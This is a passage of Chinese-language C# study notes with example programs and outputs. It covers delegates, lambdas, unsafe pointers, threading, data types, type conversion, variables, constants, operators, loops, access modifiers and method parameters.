    return num;
    }
    public static int getNum()
    {
    return num;
    }

    static void Main(string[] args)
    {
    // 创建委托实例
    NumberChanger<int> nc1 = new NumberChanger<int>(AddNum);
    NumberChanger<int> nc2 = new NumberChanger<int>(MultNum);
    // 使用委托对象调用方法
    nc1(25);
    Console.WriteLine("Value of Num: {0}", getNum());
    nc2(5);
    Console.WriteLine("Value of Num: {0}", getNum());
    Console.ReadKey();
    }
    }
    }
    Value of Num: 35
    Value of Num: 175
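
​除了泛型委托,更常见的是泛型类和泛型方法。下面用一个交换两个变量的泛型方法作示意(Swap 为假设的示例名):

    using System;

    class GenericDemo
    {
        // 泛型方法:类型参数 T 在调用时由编译器推断
        static void Swap<T>(ref T a, ref T b)
        {
            T temp = a;
            a = b;
            b = temp;
        }

        static void Main()
        {
            int x = 1, y = 2;
            Swap(ref x, ref y);
            Console.WriteLine("{0} {1}", x, y);   // 2 1

            string s1 = "hello", s2 = "world";
            Swap(ref s1, ref s2);
            Console.WriteLine("{0} {1}", s1, s2); // world hello
        }
    }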

    C# 匿名方法

    ​在 C# 中,匿名函数是一种没有名字的方法,可以在代码中定义和使用。

    ​我们已经提到过,委托是用于引用与其具有相同标签的方法。换句话说,您可以使用委托对象调用可由委托引用的方法。

    匿名方法(Anonymous methods) 提供了一种传递代码块作为委托参数的技术。

    ​在匿名方法中您不需要指定返回类型,它是从方法主体内的 return 语句推断的。

    Lambda 表达式

    ​Lambda 表达式是一个简洁的语法,用于创建匿名函数。它们通常用于 LINQ 查询和委托。

    (parameters) => expression
    // 或
    (parameters) => { statement; }
    // 示例:使用 Lambda 表达式定义一个委托
    Func<int, int, int> add = (a, b) => a + b;
    Console.WriteLine(add(2, 3)); // 输出 5

// 示例:使用 Lambda 表达式过滤数组中的元素(Where 需要 using System.Linq;)
    int[] numbers = { 1, 2, 3, 4, 5 };
    var evenNumbers = numbers.Where(n => n % 2 == 0);
    foreach (var num in evenNumbers)
    {
    Console.WriteLine(num); // 输出 2 4
    }

    匿名方法

    ​匿名方法是通过使用 delegate 关键字创建委托实例来声明的。

    using System;

    delegate void NumberChanger(int n);
    namespace DelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;
    public static void AddNum(int p)
    {
    num += p;
    Console.WriteLine("Named Method: {0}", num);
    }

    public static void MultNum(int q)
    {
    num *= q;
    Console.WriteLine("Named Method: {0}", num);
    }

    static void Main(string[] args)
    {
    // 使用匿名方法创建委托实例
    NumberChanger nc = delegate(int x)
    {
    Console.WriteLine("Anonymous Method: {0}", x);
    };

    // 使用匿名方法调用委托
    nc(10);

    // 使用命名方法实例化委托
    nc = new NumberChanger(AddNum);

    // 使用命名方法调用委托
    nc(5);

    // 使用另一个命名方法实例化委托
    nc = new NumberChanger(MultNum);

    // 使用命名方法调用委托
    nc(2);
    Console.ReadKey();
    }
    }
    }

​C# 2.0 引入了匿名方法,而 C# 3.0 及更高版本引入了 lambda 表达式,它是一种更简洁的语法形式,用于编写匿名函数。

    ​使用 lambda 表达式:

    using System;

    delegate void NumberChanger(int n);

    namespace DelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;

    public static void AddNum(int p)
    {
    num += p;
    Console.WriteLine("Named Method: {0}", num);
    }

    public static void MultNum(int q)
    {
    num *= q;
    Console.WriteLine("Named Method: {0}", num);
    }

    static void Main(string[] args)
    {
    // 使用 lambda 表达式创建委托实例
    NumberChanger nc = x => Console.WriteLine($"Lambda Expression: {x}");

    // 使用 lambda 表达式调用委托
    nc(10);

    // 使用命名方法实例化委托
    nc = new NumberChanger(AddNum);

    // 使用命名方法调用委托
    nc(5);

    // 使用另一个命名方法实例化委托
    nc = new NumberChanger(MultNum);

    // 使用命名方法调用委托
    nc(2);

    Console.ReadKey();
    }
    }
    }
    Lambda Expression: 10
    Named Method: 15
    Named Method: 30

    C# 不安全代码

​当一个代码块使用 unsafe 修饰符标记时,C# 允许在函数中使用指针变量。不安全代码或非托管代码是指使用了指针变量的代码块。编译这类代码需要在项目设置中启用“允许不安全代码”(/unsafe)选项。

​就跟 C/C++ 差不多了……

    using System;
    namespace UnsafeCodeApplication
    {
    class Program
    {
    static unsafe void Main(string[] args)
    {
    int var = 20;
    int* p = &var;
    Console.WriteLine("Data is: {0} ", var);
    Console.WriteLine("Address is: {0}", (int)p);
    Console.ReadKey();
    }
    }
    }

    C# 多线程

    线程 被定义为程序的执行路径。每个线程都定义了一个独特的控制流。如果您的应用程序涉及到复杂的和耗时的操作,那么设置不同的线程执行路径往往是有益的,每个线程执行特定的工作。

​线程是轻量级进程。一个使用线程的常见实例是现代操作系统中并行编程的实现。使用线程可以避免浪费 CPU 周期,同时提高应用程序的效率。

​到目前为止,我们编写的程序都是在单个线程中作为应用程序的单一运行实例执行的,同一时刻只能执行一个任务。为了同时执行多个任务,可以把程序划分为更小的线程。

    using System;
    using System.Threading;

    namespace MultithreadingApplication
    {
    class ThreadCreationProgram
    {
    public static void CallToChildThread()
    {
    try
    {

    Console.WriteLine("Child thread starts");
    // 计数到 10
    for (int counter = 0; counter <= 10; counter++)
    {
    Thread.Sleep(500);
    Console.WriteLine(counter);
    }
    Console.WriteLine("Child Thread Completed");

    }
    catch (ThreadAbortException e)
    {
    Console.WriteLine("Thread Abort Exception");
    }
    finally
    {
    Console.WriteLine("Couldn't catch the Thread Exception");
    }

    }

    static void Main(string[] args)
    {
    ThreadStart childref = new ThreadStart(CallToChildThread);
    Console.WriteLine("In Main: Creating the Child thread");
    Thread childThread = new Thread(childref);
    childThread.Start();
    // 停止主线程一段时间
    Thread.Sleep(2000);
    // 现在中止子线程
    Console.WriteLine("In Main: Aborting the Child thread");
childThread.Abort(); // 终止子线程(注意:Thread.Abort 在 .NET Core / .NET 5+ 中已不受支持,仅适用于 .NET Framework)
    Console.ReadKey();
    }
    }
    }
    In Main: Creating the Child thread
    Child thread starts
    0
    1
    2
    In Main: Aborting the Child thread
    Thread Abort Exception
    Couldn't catch the Thread Exception
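
​如上所述,Thread.Abort 在 .NET Core / .NET 5+ 中调用会抛出 PlatformNotSupportedException,现代写法是用 CancellationToken 做协作式取消。下面是按这种方式改写的一个示意:

    using System;
    using System.Threading;

    class CancellationDemo
    {
        static void Worker(CancellationToken token)
        {
            for (int i = 0; i <= 10; i++)
            {
                // 线程定期检查取消标记,自行决定何时退出
                if (token.IsCancellationRequested)
                {
                    Console.WriteLine("Child thread canceled");
                    return;
                }
                Thread.Sleep(500);
                Console.WriteLine(i);
            }
        }

        static void Main()
        {
            var cts = new CancellationTokenSource();
            var t = new Thread(() => Worker(cts.Token));
            t.Start();

            Thread.Sleep(2000);
            cts.Cancel();   // 请求取消,而不是强行终止
            t.Join();
        }
    }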
正文

    基础语法

    Hello world


​VS 里创建一个“控制台应用(.NET Framework)”项目。


    ​开始 Hello World!

    using System;
    namespace HelloWorldApplication
    {
    /* 类名为 HelloWorld */
    class HelloWorld
    {
    /* main 函数 */
    static void Main(string[] args)
    {
    /* 我的第一个 C# 程序 */
    Console.WriteLine("Hello World!");
    Console.ReadKey();
    }
    }
    }

    C# 环境

    C# 是 .Net 框架的一部分,且用于编写 .Net 应用程序。

    Unity 使用开源 .NET 平台,以确保使用 Unity 创建的应用程序可以在各种不同的硬件配置上运行。

    .Net 框架是一个创新的平台,能帮您编写出下面类型的应用程序:

    • Windows 应用程序
    • Web 应用程序
    • Web 服务

    C# 程序结构

    一个 C# 程序主要包括以下部分:

    • 命名空间声明(Namespace declaration)
    • 一个 class
    • Class 方法
    • Class 属性
    • 一个 Main 方法
    • 语句(Statements)& 表达式(Expressions)
    • 注释
    using System;  // using 关键字用于在程序中包含 System 命名空间。
    namespace HelloWorldApplication // 一个 namespace 里包含了一系列的类。便于管理,还可以防止类重名,在这里也可以不写。
    {
    class HelloWorld // C# 是完全面向对象的语言,执行代码必须放在一个类中
    {
    static void Main(string[] args) // Main 方法,是所有 C# 程序的入口点。Main 方法说明当执行时类将做什么动作。
    {
    /* 我的第一个 C# 程序*/
    Console.WriteLine("Hello World");
    Console.ReadKey(); // 针对 VS.NET 用户的。这使得程序会等待一个按键的动作,防止程序从 Visual Studio .NET 启动时屏幕会快速运行并关闭。在 VS2022 中,也可以 Ctrl + F5 启动调试防止控制台自动关闭。
    }
    }
    }

    C# 基本语法

    ​C# 是一种面向对象的编程语言。在面向对象的程序设计方法中,程序由各种相互交互的对象组成。相同种类的对象通常具有相同的类型,或者说,是在相同的 class 中。

​例如,以 Rectangle(矩形)对象为例。它具有 length 和 width 属性。根据设计,它可能需要接受这些属性值、计算面积和显示细节。

    using System;
    namespace RectangleApplication
    {
    class Rectangle
    {
    // 成员变量
    double length;
    double width;
    public void Acceptdetails()
    {
    length = 4.5;
    width = 3.5;
    }
    public double GetArea()
    {
    return length * width;
    }
    public void Display()
    {
    Console.WriteLine("Length: {0}", length);
    Console.WriteLine("Width: {0}", width);
    Console.WriteLine("Area: {0}", GetArea());
    }
    }

    class ExecuteRectangle
    {
    static void Main(string[] args)
    {
    Rectangle r = new Rectangle();
    r.Acceptdetails();
    r.Display();
    Console.ReadLine();
    }
    }
    }
    Length: 4.5
    Width: 3.5
    Area: 15.75

    C# 数据类型

    在 C# 中,变量分为以下几种类型:

    • 值类型(Value types)
    • 引用类型(Reference types)
    • 指针类型(Pointer types)

    值类型(Value types)

    using System;

    namespace ConsoleApplication1
    {
    class Program
    {
    static void Main(string[] args)
    {
    PrintValueTypeRange();
    }
    static void PrintValueTypeRange()
    {
    Console.WriteLine("int 类型的最大值是:{0}", int.MaxValue); // 32 位有符号整数类型
    Console.WriteLine("uint 类型的最大值是:{0}", uint.MaxValue); // 32 位无符号整数类型
    Console.WriteLine("byte 类型的最大值是:{0}", byte.MaxValue); // 8 位无符号整数
    Console.WriteLine("sbyte 类型的最大值是:{0}", sbyte.MaxValue); // 8 位有符号整数类型
    Console.WriteLine("short 类型的最大值是:{0}", short.MaxValue); // 16 位有符号整数类型
    Console.WriteLine("ushort 类型的最大值是:{0}", ushort.MaxValue); // 16 位无符号整数类型
    Console.WriteLine("long 类型的最大值是:{0}", long.MaxValue); // 64 位有符号整数类型
    Console.WriteLine("ulong 类型的最大值是:{0}", ulong.MaxValue); // 64 位无符号整数类型
    Console.WriteLine("float 类型的最大值是:{0}", float.MaxValue); // 32 位单精度浮点型
    Console.WriteLine("double 类型的最大值是:{0}", double.MaxValue); // 64 位双精度浮点型
    Console.WriteLine("decimal 类型的最大值是:{0}", decimal.MaxValue); // 128 位精确的十进制值,28-29 有效位数
    Console.WriteLine("int 类型的最小值是:{0}", int.MinValue);
    Console.WriteLine("uint 类型的最小值是:{0}", uint.MinValue);
    Console.WriteLine("byte 类型的最小值是:{0}", byte.MinValue);
    Console.WriteLine("sbyte 类型的最小值是:{0}", sbyte.MinValue);
    Console.WriteLine("short 类型的最小值是:{0}", short.MinValue);
    Console.WriteLine("ushort 类型的最小值是:{0}", ushort.MinValue);
    Console.WriteLine("long 类型的最小值是:{0}", long.MinValue);
    Console.WriteLine("ulong 类型的最小值是:{0}", ulong.MinValue);
    Console.WriteLine("float 类型的最小值是:{0}", float.MinValue);
    Console.WriteLine("double 类型的最小值是:{0}", double.MinValue);
    Console.WriteLine("decimal 类型的最小值是:{0}", decimal.MinValue);
    Console.ReadKey();
    }
    }
    }
int 类型的最大值是:2147483647
    uint 类型的最大值是:4294967295
    byte 类型的最大值是:255
    sbyte 类型的最大值是:127
    short 类型的最大值是:32767
    ushort 类型的最大值是:65535
    long 类型的最大值是:9223372036854775807
    ulong 类型的最大值是:18446744073709551615
    float 类型的最大值是:3.402823E+38
    double 类型的最大值是:1.79769313486232E+308
    decimal 类型的最大值是:79228162514264337593543950335
    int 类型的最小值是:-2147483648
    uint 类型的最小值是:0
    byte 类型的最小值是:0
    sbyte 类型的最小值是:-128
    short 类型的最小值是:-32768
    ushort 类型的最小值是:0
    long 类型的最小值是:-9223372036854775808
    ulong 类型的最小值是:0
    float 类型的最小值是:-3.402823E+38
    double 类型的最小值是:-1.79769313486232E+308
    decimal 类型的最小值是:-79228162514264337593543950335

    ​Decimal 不是浮点数据类型。Decimal 结构包含一个二进制整数值以及一个符号位和一个整数比例因子,该比例因子用于指定该值的小数部分。因此,在内存中,Decimal 数字的表示形式比浮点类型(Single 和 Double)更精确。Decimal 数据类型用于存储精确的小数值。与 Float 和 Double 等浮点数数据类型相比,Decimal 能够提供更高的精度,避免了浮点数计算中的舍入误差。
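
​一个经典的对比:二进制浮点数无法精确表示 0.1,而 decimal 可以。下面的小示意演示了这一点(具体打印出的小数位数取决于运行时的默认格式化方式):

    using System;

    class Demo
    {
        static void Main()
        {
            double d = 0.1 + 0.2;
            decimal m = 0.1m + 0.2m;

            Console.WriteLine(d == 0.3);   // False:double 存在二进制舍入误差
            Console.WriteLine(m == 0.3m);  // True:decimal 精确表示十进制小数
        }
    }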

​如需得到一个类型或一个变量在特定平台上的准确尺寸,可以使用 sizeof 运算符。表达式 sizeof(type) 以字节为单位返回对象或类型的存储尺寸。

    using System;

    namespace DataTypeApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    Console.WriteLine("Size of bool: {0}", sizeof(bool));
    Console.WriteLine("Size of byte: {0}", sizeof(byte));
    Console.WriteLine("Size of sbyte: {0}", sizeof(sbyte));
    Console.WriteLine("Size of int: {0}", sizeof(int));
    Console.WriteLine("Size of float: {0}", sizeof(float));
    Console.WriteLine("Size of double: {0}", sizeof(double));
    Console.WriteLine("Size of decimal: {0}", sizeof(decimal));
    Console.ReadLine();
    }
    }
    }
    Size of bool: 1
    Size of byte: 1
    Size of sbyte: 1
    Size of int: 4
    Size of float: 4
    Size of double: 8
    Size of decimal: 16

    对象(Object)类型

对象(Object)类型是 C# 通用类型系统(Common Type System - CTS)中所有数据类型的终极基类。object 是 System.Object 类的别名。所以对象(Object)类型可以被分配任何其他类型(值类型、引用类型、预定义类型或用户自定义类型)的值。但是,在分配值之前,需要先进行类型转换。

    ​当一个值类型转换为对象类型时,则被称为装箱;另一方面,当一个对象类型转换为值类型时,则被称为拆箱

    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    // 原始值类型
    int original = 10;

    // 装箱过程,将 int 类型装箱为 object 类型
    object boxed = original;

    // 拆箱过程,将 object 类型拆箱为 int 类型
    int unboxed = (int)boxed;

    Console.WriteLine($"原始值:{original}");
    Console.WriteLine($"拆箱后的值:{unboxed}");
    }
    }
    }
    原始值:10
    拆箱后的值:10

    动态(Dynamic)类型

    ​您可以存储任何类型的值在动态数据类型变量中。这些变量的类型检查是在运行时发生的。

    ​声明动态类型的语法:

    dynamic d = 20;

    ​动态类型与对象类型相似,但是对象类型变量的类型检查是在编译时发生的,而动态类型变量的类型检查是在运行时发生的

​C# 是静态类型语言,即在编译过程中执行类型检查。举个简单的例子:如果一个方法的返回类型过于复杂,那么推荐用 var 来接收;但当你明确知道返回类型,或者返回的只是简单类型时,推荐直接用该数据类型来声明,就像平时我们经常用 string、int、bool 等声明返回类型一样。

​var 和 dynamic 关键字之间的主要区别在于绑定时间不一样:var 是早期绑定(编译期),dynamic 则会在运行时进行绑定。

    var 实际上是编译器抛给我们的语法糖,一旦被编译,编译器就会自动匹配 var 变量的实际类型,并用实际类型来替换该变量的声明,等同于我们在编码时使用了实际类型声明。而 dynamic 被编译后是一个 Object 类型,编译器编译时不会对 dynamic 进行类型检查。
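
​下面用一个小示意对比两者:var 在编译期就确定类型,写错成员会直接编译失败;dynamic 则把检查推迟到运行时:

    using System;

    class Demo
    {
        static void Main()
        {
            var s = "hello";        // 编译期即确定为 string
            Console.WriteLine(s.Length);
            // s = 123;             // 编译错误:不能把 int 赋给 string

            dynamic d = "hello";    // 运行时才检查类型
            Console.WriteLine(d.Length);
            d = 123;                // 合法:dynamic 变量可以改存其他类型
            Console.WriteLine(d + 1);
            // Console.WriteLine(d.Length); // 编译通过,但运行时抛 RuntimeBinderException
        }
    }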

String Type

The string type lets you assign any string value to a variable. string is an alias for the System.String class and derives from the object type. A string value can be written in two forms: quoted and @-quoted.

​For example:

    string str = "runoob.com";

​A C# string can be prefixed with @ (making a "verbatim string"), which treats the escape character \ as an ordinary character (similar to Python's raw-string prefix r), for example:

    string str = @"C:\Windows";

​which is equivalent to:

    string str = "C:\\Windows";

​An @-quoted string may span multiple lines; the line breaks and the indentation spaces are all counted in the string's length.

    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    string str = @"<script type=""text/javascript"">
    <!--
    -->
    </script>";
    Console.WriteLine(str);
    Console.ReadLine();
    }
    }
    }
    <script type="text/javascript">
    <!--
    -->
    </script>

​User-defined reference types include class, interface, and delegate. We will discuss these in later chapters.

Pointer Types

​A pointer type variable stores the memory address of another type. Pointers in C# have the same capabilities as pointers in C or C++.

    type* identifier;

C# Type Conversion

​Type conversion in C# comes in two kinds: implicit conversion and explicit conversion (also called casting).

Implicit Conversion

​An implicit conversion needs no special syntax; the compiler performs it automatically.

​An implicit conversion happens when a type with a smaller range is converted to a type with a larger range (e.g. from int to long, or from float to double). The compiler completes the conversion automatically; these are C#'s default conversions, performed safely, and they cause no data loss.

byte b = 10;
int i = b; // implicit conversion, no cast required

Explicit Conversion

​An explicit conversion, i.e. a cast, must be specified by the programmer in the code.

​An explicit conversion is needed when converting a type with a larger range to one with a smaller range, or when converting one object type to another; it uses the cast syntax, and the forced conversion may lose data.

    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    double a = 3.141592653589;
    float b = 3.141592653589f;

    Console.WriteLine(a + "");
    Console.WriteLine((float)a + "");
    Console.WriteLine(b);
    Console.ReadLine();
    }
    }
    }
    3.141592653589
    3.141593
    3.141593

C# Type Conversion Methods

​The System.Convert class provides functions for type conversion. They offer a safe way to convert, because they handle null values, and they throw an exception if the conversion is not possible.

Why doesn't C# have System.Convert.ToFloat()?

​It does, but it is called Convert.ToSingle(), because float is the C# alias for the type System.Single.

​"Single" is the BCL name for the single-precision floating-point type; "float" is the alias C# supplies. So there is a Convert.ToSingle() method, just as there is Convert.ToInt32() rather than Convert.ToInt().

Types like float and int are merely C# syntactic sugar; in the .NET Framework they are Single, Int32, and so on. What would be Convert.ToFloat() is therefore actually Convert.ToSingle.

​The author of CLR via C# recommends never using int, short, float and the like, and always using the native type names Int32, Int16, Single, so that cross-language work is not confused by any one language's particular aliases. (Well said; I'll keep using the aliases anyway.)

    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    string a = "3.1415926535";
    float b = Convert.ToSingle(a);
    Single c = Convert.ToSingle(a);
    double d = Convert.ToDouble(a);

    Console.WriteLine(a);
    Console.WriteLine(b);
    Console.WriteLine(c);
    Console.WriteLine(d);
    Console.ReadLine();
    }
    }
    }
    3.1415926535
    3.141593
    3.141593
    3.1415926535

​.ToString() converts a value of a given type to a string; appending + "" also works.

    using System;

    namespace TypeConversionApplication
    {
    class StringConversion
    {
    static void Main(string[] args)
    {
    int i = 75;
    float f = 53.005f;
    double d = 2345.7652;
    bool b = true;
    Console.WriteLine(i.ToString());
    Console.WriteLine(f.ToString());
    Console.WriteLine(d.ToString());
    Console.WriteLine(b.ToString());
    Console.ReadKey();
    }
    }
    }

The Parse Method

​Parse converts a string to the corresponding numeric type; if the conversion fails it throws an exception.

    string str = "123.45";
    double d = double.Parse(str);

The TryParse Method

​TryParse is similar to Parse, but instead of throwing an exception it returns a Boolean indicating whether the conversion succeeded.

    using System;

    namespace Test
    {
    class Program
    {
    static void Main(string[] args)
    {
    string str = "123.45";
    double d;
    bool success = double.TryParse(str, out d);

    if (success)
    {
    Console.WriteLine("转换成功: " + d);
    }
    else
    {
    Console.WriteLine("转换失败");
    }

    int i;
    success = int.TryParse(str, out i);

    if (success)
    {
    Console.WriteLine("转换成功: " + i);
    }
    else
    {
    Console.WriteLine("转换失败");
    }

    Console.ReadKey();
    }
    }
    }
    转换成功: 123.45
    转换失败

User-Defined Type Conversions

​C# also lets you define custom type conversions, by declaring conversion operators in a type with the implicit or explicit keyword.

    using System;

    public class Fahrenheit
    {
    public double Degrees { get; set; }

    public Fahrenheit(double degrees)
    {
    Degrees = degrees;
    }

    // 隐式转换从华氏温度转为摄氏温度
    public static implicit operator Celsius(Fahrenheit f)
    {
    return new Celsius((f.Degrees - 32) / 1.8);
    }

    // 显式转换从摄氏温度转为华氏温度
    public static explicit operator Fahrenheit(Celsius c)
    {
    return new Fahrenheit(32 + c.Degrees * 1.8);
    }
    }

    public class Celsius
    {
    public double Degrees { get; set; }

    public Celsius(double degrees)
    {
    Degrees = degrees;
    }
    }

    public class Program
    {
    public static void Main()
    {
    Celsius c = new Celsius(37);
    Fahrenheit f = new Fahrenheit(98.6);
    Celsius c2 = f; // 使用隐式转换
    Fahrenheit f2 = (Fahrenheit)c; // 使用显式转换

    Console.WriteLine(c.Degrees + "°C");
    Console.WriteLine(f.Degrees + "°F");
    Console.WriteLine(c2.Degrees + "°C");
    Console.WriteLine(f2.Degrees + "°F");

    Console.ReadKey();
    }
    }

implicit defines an implicit conversion.

explicit defines an explicit conversion.

The operator keyword is mainly used to overload operators; it is also used for user-defined type conversions in a class or struct.

    37°C
    98.6°F
    37°C
    98.6°F

C# Variables

​A variable is nothing more than a name for a storage area that the program can manipulate.

Variable Definitions in C#

​In C#, variable names must follow a few rules:

• Variable names may contain letters, digits, and underscores.
• A variable name must begin with a letter or an underscore.
• Variable names are case-sensitive.
• Avoid using C# keywords as variable names.

Variable Initialization in C#

​Initializing variables properly is a good programming habit; otherwise a program may occasionally produce unexpected results.

    using System;

    namespace VariableDefinition
    {
    class Program
    {
    static void Main(string[] args)
    {
    short a;
    int b;
    double c;

    /* 实际初始化 */
    a = 10;
    b = 20;
    c = a + b;
    Console.WriteLine("a = {0}, b = {1}, c = {2}", a, b, c);
    Console.ReadLine();
    }
    }
    }
    a = 10, b = 20, c = 30

Accepting Values from the User

​The Console class in the System namespace provides the function ReadLine(), which accepts input from the user and stores it in a variable. (Comparable to scanf().)

    using System;

    namespace VariableDefinition
    {
    class Program
    {
    static void Main(string[] args)
    {
    int num;
    num = Convert.ToInt32(Console.ReadLine());
    Console.WriteLine(num);
    Console.ReadLine();
    }
    }
    }

Lvalues and Rvalues in C#

​C# has two kinds of expressions:

1. lvalue: an lvalue expression may appear on either the left or the right side of an assignment.
2. rvalue: an rvalue expression may appear on the right side of an assignment but not on the left.

​Variables are lvalues, so they may appear on the left of an assignment. Numeric literals are rvalues, so they cannot be assigned to and may not appear on the left. The following is a valid statement:

    int g = 20;

The following is an invalid statement and produces a compile-time error:

    10 = 20;

C# Variable Scope

​In C#, a variable's scope defines its visibility and lifetime.

​A variable's scope is usually determined by the code block, delimited by braces {}, in which it is declared.

Member Variable Scope

​C# is a fully object-oriented language, so the closest thing to a global variable is a field declared at class level:

class MyClass
{
int memberVar = 30; // member variable, visible throughout the class
}

Static Variable Scope

static variables are declared at class level, and their scope too is limited to the class that defines them.

class MyClass
{
static int staticVar = 40; // static variable, visible throughout the class
}

Loop Variable Scope

​A loop variable declared in a for statement is visible inside the loop body.

for (int i = 0; i < 5; i++)
{
// i is visible inside the loop body
}
// i is not visible here

​Overall, variable scope helps manage a variable's visibility and lifetime, ensures the variable is used only within its valid range, and helps prevent naming conflicts.

C# Constants

​Constants can be treated like regular variables, except that their values cannot be modified after they are defined.

Integer Constants

​An integer constant can be a decimal or hexadecimal constant.

A prefix specifies the base:

• 0x or 0X for hexadecimal
• no prefix for decimal

(Note: unlike C/C++, C# has no octal literals; a leading 0 does not change the base. Since C# 7.0, 0b or 0B denotes a binary literal.)

​An integer constant can also take a suffix that is a combination of U and L, where:

• U and L stand for unsigned and long respectively.

  The suffix may be upper- or lowercase, and multiple suffixes may be combined in any order.

    using System;

    namespace VariableDefinition
    {
    class Program
    {
    static void Main(string[] args)
    {
    var num = 0xFeeL;
    Console.WriteLine(num);
    Console.ReadLine();
    }
    }
    }
    4078

Floating-Point Constants

​A floating-point constant consists of an integer part, a decimal point, a fractional part, and an exponent part. You can write floating-point constants in decimal or in exponential form.

​The original page claims 314159E-5L is legal; in testing it is not: only 314159E-5 compiles.

Character Constants

using System;

namespace EscapeChar
    {
    class Program
    {
    static void Main(string[] args)
    {
    Console.WriteLine("Hello\tWorld\n\n");
    Console.ReadLine();
    }
    }
    }

​And so on.

String Constants

    string a = "hello, world";  // hello, world
    string b = @"hello, world"; // hello, world
    string c = "hello \t world"; // hello world
    string d = @"hello \t world"; // hello \t world
    string e = "Joe said \"Hello\" to me"; // Joe said "Hello" to me
    string f = @"Joe said ""Hello"" to me"; // Joe said "Hello" to me
    string g = "\\\\server\\share\\file.txt"; // \\server\share\file.txt
    string h = @"\\server\share\file.txt"; // \\server\share\file.txt
    string i = "one\r\ntwo\r\nthree";
    string j = @"one
    two
    three";

​Carriage return and newline are related but distinct concepts; they are usually used together to control how text is laid out and formatted when displayed or stored.

1. Carriage return (\r)
  • A control character that moves the cursor to the beginning of the current line without advancing to the next line. On early typewriters and teleprinters, the carriage-return operation moved the print head back to the left edge of the paper (the "return" position), so the machine could start printing a new line from the left.
  • In computing, carriage return is the ASCII character with value 13 (0x0D).
2. Newline (\n)
  • Another control character, indicating that a new line should begin at the current position. It normally moves the cursor to the beginning of the next line so writing continues from there.
  • In computing, newline is the ASCII character with value 10 (0x0A).

​Conventions differ between modern operating systems: Windows uses \r\n as its standard line ending, while Unix and Linux systems (and modern macOS) normally use \n alone. This difference can cause formatting problems when text files are handled across platforms.

​To summarize:

• Carriage return (\r): moves the cursor to the beginning of the current line.
• Newline (\n): moves the cursor to the beginning of the next line; combined with a carriage return it forms the familiar \r\n line ending.

Defining Constants

​Constants are defined with the const keyword.

C# Operators

​Mostly the same as in C/C++; below I note only what I had not met before.

is tests whether an object is of a given type. (In the example below, the literal 3.14 is a double, not a float, which is why the program prints False.)

    using System;

    namespace VariableDefinition
    {
    class Program
    {
    static void Main(string[] args)
    {
    dynamic a = 3.14;
    Console.WriteLine(a is float);
    Console.ReadLine();
    }
    }
    }
    False

as performs a cast that does not throw an exception when it fails; it returns null instead.

    using System;

    namespace AsOperatorExample
    {
    class Program
    {
    static void Main(string[] args)
    {
    object obj = "This is a string";

    // Using 'as' operator to cast obj to string
    string str = obj as string;

    if (str != null)
    {
    Console.WriteLine("The object was successfully cast to a string.");
    Console.WriteLine(str);
    }
    else
    {
    Console.WriteLine("The object could not be cast to a string.");
    }

    // Attempting to cast obj to an incompatible type
    obj = 123;
    str = obj as string;

    if (str == null)
    {
    Console.WriteLine("The object could not be cast to a string because it is not a compatible type.");
    }
    }
    }
    }
    The object was successfully cast to a string.
    This is a string
    The object could not be cast to a string because it is not a compatible type.

typeof() returns the System.Type object describing a type.

    using System;

    class Program
    {
    static void Main(string[] args)
    {
    Type type = typeof(string);
    Console.WriteLine(type.FullName);
    Console.ReadKey();
    }
    }
    System.String

C# Decision Making

​Same as in C/C++.

C# Loops

​Defining an array in C#:

int[] fibarray = new int[] { 0, 1, 1, 2, 3, 5, 8, 13 };

​Defining a list in C#:

// create a list of strings (requires using System.Collections.Generic;)
List<string> myStrings = new List<string>();

// add some string elements to the list
myStrings.Add("Google");
myStrings.Add("Runoob");
myStrings.Add("Taobao");

​Loop syntax is mostly the same as in C/C++. Let's try foreach, which I had never been very comfortable with:

    class ForEachTest
    {
    static void Main(string[] args)
    {
    int[] fibarray = new int[] { 0, 1, 1, 2, 3, 5, 8, 13 };
    foreach (int element in fibarray)
    {
    System.Console.WriteLine(element);
    }
    System.Console.WriteLine();

// a for loop equivalent to the foreach above
    for (int i = 0; i < fibarray.Length; i++)
    {
    System.Console.WriteLine(fibarray[i]);
    }
    System.Console.WriteLine();

// a counter for the elements in the collection
    int count = 0;
    foreach (int element in fibarray)
    {
    count += 1;
    System.Console.WriteLine("Element #{0}: {1}", count, element);
    }
    System.Console.WriteLine("Number of elements in the array: {0}", count);
    }
    }
    0
    1
    1
    2
    3
    5
    8
    13

    0
    1
    1
    2
    3
    5
    8
    13

    Element #1: 0
    Element #2: 1
    Element #3: 1
    Element #4: 2
    Element #5: 3
    Element #6: 5
    Element #7: 8
    Element #8: 13
    Number of elements in the array: 8

C# Encapsulation

​An access modifier defines the scope and visibility of a class member. C# supports the following access modifiers:

• public: accessible to all objects;
• private: accessible only inside the object itself;
• protected: accessible to the class and to objects of its subclasses
  • this is what makes inheritance practical
• internal: accessible to objects within the same assembly;
• protected internal: access limited to the current assembly or to types derived from the containing class.

​An analogy: a man A is the parent class; B is his son (a subclass of A), C is his wife (inside the household but not a subclass), and D is his illegitimate son (note: D does not live in his house, so he is a subclass but not inside the household).

​If we attach modifiers to A's affairs, as sketched in code after this list:

• a public affair: the whole world knows, fully public

• a protected affair: A, B and D know (A and all his sons; wife C does not)

• a private affair: only A knows (secrets? private thoughts?)

• an internal affair: A, B and C know (everyone in the household; the illegitimate son D does not)

• a protected internal affair: A, B, C and D all know; nobody else does

C# Methods

    <Access Specifier> <Return Type> <Method Name>(Parameter List)
    {
    Method Body
    }
• Access Specifier: the access modifier; it determines the visibility of the variable or method to other classes.
• Return type: a method may return a value, and the return type is the data type of that value. If the method returns nothing, the return type is void.
• Method name: a unique, case-sensitive identifier. It cannot be the same as any other identifier declared in the class.
• Parameter list: enclosed in parentheses; the parameters pass data to and receive data from the method. The parameter list refers to the types, order, and number of the method's parameters. Parameters are optional: a method may have none.
• Method body: the set of instructions needed to complete the task.

Passing Parameters by Value

​This is the default way of passing parameters: when a method is called, a new storage location is created for each value parameter.

​The value of each actual argument is copied into the corresponding formal parameter; argument and parameter use two different locations in memory. So when the parameter's value changes, the argument is unaffected, which keeps the caller's data safe. The following example demonstrates this:

    using System;
    namespace CalculatorApplication
    {
    class NumberManipulator
    {
    public void swap(int x, int y)
    {
    int temp;

